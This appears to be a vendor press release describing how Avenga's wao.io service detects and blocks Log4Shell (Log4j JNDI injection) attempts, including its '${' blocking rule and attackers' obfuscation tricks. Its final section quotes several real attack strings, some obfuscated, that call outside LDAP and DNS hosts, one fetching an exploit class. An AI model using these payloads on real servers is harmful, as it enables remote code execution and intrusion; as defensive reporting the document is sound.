Log4j exploit: Avenga’s wao.io protects web services and their users from critical vulnerability

Avenga's press release wao

The critical zero-day vulnerability in version 2.14.1 of the widespread Apache Log4j Library published on December 9 affects almost all online services worldwide. Avenga’s security experts have analyzed the possibilities for exploiting this vulnerability and implemented initial protective measures in the company’s own wao.io service. The cloud solution can be integrated like a content delivery network and is primarily used by numerous e-commerce companies to offer web stores more securely and quickly without changes to the code of their sites.

In the first 72 hours since the vulnerability became known, wao.io has blocked 1,159 malicious requests from attackers on customer sites. Two specific measures in particular are being used:

  • URL and Request Header (e.g. User-Agent): Strings with the suspicious sequence ${ (identically %24 and %7b) cause the query to be blocked.
  • POST Requests: For form posts (such as HTML login forms), these values are also scanned for suspicious strings and blocked if necessary.

Although the attacks all try to inject a pattern of the form ${jndi:ldap…, it is not enough to just look for this substring to successfully defend against all attackers. While this would be a simple first step to detect the most obvious form of the attack, the attackers are already one step ahead by making improvements to the attack during the first few days: for obfuscation, they use nested constructs to make the injection unrecognizable, e.g. ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}…

If this string is parsed, it resolves back to the original form, but is no longer found by a simple search for ${jndi:ldap…. In addition to the LDAP functions, DNS resolutions are also tried. With the security mechanisms set up by wao.io in the last few days, even such more sophisticated attacks are detected and defended against.

The risk of inadvertently blocking legitimate requests with these characters (false positives) is very low. Nevertheless, experts continuously analyze the log files and ensure that wao.io customers can continue to operate their websites not only securely, but also reliably and without downtime.

"We will continue to monitor the activity around the log4shell gap and adapt the protection in wao.io accordingly," says Roland Guelle, VP Technology at Avenga. He continued, "It's important to understand that wao.io alone is still not enough protection. There are also other ways to exploit the gap that we cannot prevent with our approach. Users should therefore definitely take steps on their end to replace the malicious software version, or prevent the execution of the problematic code through appropriate settings."

The team behind wao.io continuously analyzes the behavior of attackers in order to be able to react immediately to modified attacks. This has already revealed numerous cases of combinations of different attack patterns: Other types of attacks (e.g. code or SQL injections) are also being tested, and the tests are now additionally being extended to include the newly disclosed vulnerability. This makes it clear that comprehensive website protection is absolutely essential, regardless of the current security vulnerability and beyond. Companies should also rely on their own experts with appropriate monitoring for this purpose, as well as additionally choosing CDN providers that include a protective function against these and other attack vectors. It is also advisable to take out appropriate insurance in case the countermeasures fail or come too late.

Examples of attack requests that have come to the attention of Avenga’s security experts include

User-Agent:

${jndi:ldap://c6rlj0ovc25q3hjjf3tgcg5iubyyyyypw.interact.sh/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.example.com}

Request-Header via:

${jndi:ldap://n714d2e7e.aHR0cDovL3JhdG9yLXN0YWdlLm5ldHpjbHViLm5ldDo4MA==.dnsprobe.${::-r}edteam.tf/exploit.class}

Request-Header x-forwarded-for:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.0000nlm6c0j53v2s668g61398133715me.interact.sh}

Path:

/?test=${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://interactsh-url/poc}